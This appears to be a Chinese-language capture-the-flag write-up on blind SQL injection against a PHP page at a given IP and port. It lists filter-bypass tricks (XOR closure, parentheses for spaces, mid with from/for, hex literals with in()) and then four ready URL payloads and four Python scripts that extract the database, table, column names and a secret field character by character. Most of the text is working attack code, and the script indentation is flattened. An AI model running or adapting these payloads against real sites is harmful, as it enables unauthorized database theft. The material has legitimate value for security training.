考点
异或闭合 '^1^',两空字符异或是0,0和1异或结果是1
空格,%0b被过滤,用()绕过,绕的时候很容易眼花
ord、ascii、substr被过滤,而且没法用空格或者/**/绕过
mid没被过滤,可以用mid查询字母对比,但是mysql数据库是不分大小写,所以查询结果无法区分大小写
逗号被过滤
limit 0,1用limit 1 offset 0代替、
substr(字符串,2,1) 用 substr(字符串 from 2 for 1)代替、
但是这里学到了一个姿势,可以不用limit
select group_concat(distinct(table_name)) 可以查多个表名列名
用 where(table_schema)in(0x776562))的形式来代替 where table_schema='web'
用 in(0x十六进制) 的形式来代替 ='a'
凡是库表列名都用十六进制表示
这里给出四句关键的payload
http://54.222.188.152:25718/index.php?id='^(mid(database()from(0)for(1))in(0x61))^'
http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(0)for(1))in(0x61))^'
http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(0)for(1))in(0x61))^'
http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(secret)))from(web.message))from(0)for(1))in(0x61))^'
Paste_Image.png
Paste_Image.png
database.py
import requests
url="http://54.222.188.152:25718/index.php?id="
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
result=''
for i in range(0,10):
i =str(i)
for j in chars:
j=hex(ord(j))
payload = "'^(mid(database()from(%s)for(1))in(%s))^'"%(i,j)
# print url+payload
r=requests.get(url+payload)
# print r.text
if 'Hello' in r.text:
result +=chr(int(j,16))
print result
table.py
import requests
url="http://54.222.188.152:25718/index.php?id="
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
result=''
for i in range(0,50):
i =str(i)
for j in chars:
j=hex(ord(j))
payload = "'^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(%s)for(1))in(%s))^'"%(i,j)
# print url+payload
r=requests.get(url+payload)
# print r.text
if 'Hello' in r.text:
result +=chr(int(j,16))
print result
column.py
import requests
url="http://54.222.188.152:25718/index.php?id="
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
result=''
for i in range(0,50):
i =str(i)
for j in chars:
j=hex(ord(j))
payload = "'^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(%s)for(1))in(%s))^'"%(i,j)
# print url+payload
r=requests.get(url+payload)
# print r.text
if 'Hello' in r.text:
result += chr(int(j,16))
print result
dump.py
#!coding:utf-8
import requests
url="http://54.222.188.152:25718/index.php?id="
chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],. ' #这里缩小了字符集合
#chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
#mysql数据库是不分大小写的,这里由于ord和ascii都被过滤了,所以只能用in查询字母对比,所以是无法区分大小写,大小写查询都对
result=''
for i in range(0,100):
i =str(i)
for j in chars:
j=hex(ord(j))
payload = "'^(mid((select(group_concat(distinct(secret)))from(web.message))from(%s)for(1))in(%s))^'"%(i,j)
# print url+payload
r=requests.get(url+payload)
# print r.text
if 'Hello' in r.text:
result += chr(int(j,16))
print result
Paste_Image.png
Paste_Image.png
Paste_Image.png
Paste_Image.png
Paste_Image.png